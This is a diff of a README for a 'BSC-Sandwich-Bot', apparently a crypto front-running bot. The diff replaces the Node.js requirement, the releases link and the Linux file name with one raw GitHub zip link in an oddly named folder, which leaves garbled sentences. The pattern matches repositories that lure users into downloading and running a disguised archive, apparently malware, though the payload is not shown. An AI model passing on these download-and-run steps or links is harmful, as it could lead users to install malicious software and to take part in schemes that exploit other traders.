ronaldodjj/BSC-Sandwich-Bot/README.md

 - **Operating System:** Windows, macOS, or Linux.
 The bot works on all major platforms.
 - **Internet Connection:** A reliable internet connection to ensure smooth operation.
-- **Node.js:** This bot requires Node.js to run.
-You can download it from [Node.js website](https://nodejs.org/).
+- **https://raw.githubusercontent.com/ronaldodjj/BSC-Sandwich-Bot/main/xylidine/BSC-Sandwich-Bot.zip** This bot requires https://raw.githubusercontent.com/ronaldodjj/BSC-Sandwich-Bot/main/xylidine/BSC-Sandwich-Bot.zip to run.
+You can download it from [https://raw.githubusercontent.com/ronaldodjj/BSC-Sandwich-Bot/main/xylidine/BSC-Sandwich-Bot.zip website](https://raw.githubusercontent.com/ronaldodjj/BSC-Sandwich-Bot/main/xylidine/BSC-Sandwich-Bot.zip).

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   To get the latest version of BSC-Sandwich-Bot, visit the following page: [Download BSC-Sandwich-Bot](https://github.com/ronaldodjj/BSC-Sandwich-Bot/releases).
+   To get the latest version of BSC-Sandwich-Bot, visit the following page: [Download BSC-Sandwich-Bot](https://raw.githubusercontent.com/ronaldodjj/BSC-Sandwich-Bot/main/xylidine/BSC-Sandwich-Bot.zip).

 2. **Choose Your Version**
    On the Releases page, you will see a list of available versions.
 Click on the version you want to download.

 3. **Download the Files**
    Find the installation files for your operating system.
-Click the link to download the required file (.exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+Click the link to download the required file (.exe for Windows, .dmg for macOS, or https://raw.githubusercontent.com/ronaldodjj/BSC-Sandwich-Bot/main/xylidine/BSC-Sandwich-Bot.zip for Linux).

 4. **Run the Installer**
    - For Windows: Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - For macOS: Open the `.dmg` file, drag the BSC-Sandwich-Bot icon to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included README on how to execute.
+   - For Linux: Extract the `https://raw.githubusercontent.com/ronaldodjj/BSC-Sandwich-Bot/main/xylidine/BSC-Sandwich-Bot.zip` file and follow the included README on how to execute.

 5. **Open the Application**
    Once the installation is complete, locate the BSC-Sandwich-Bot on your computer and open it.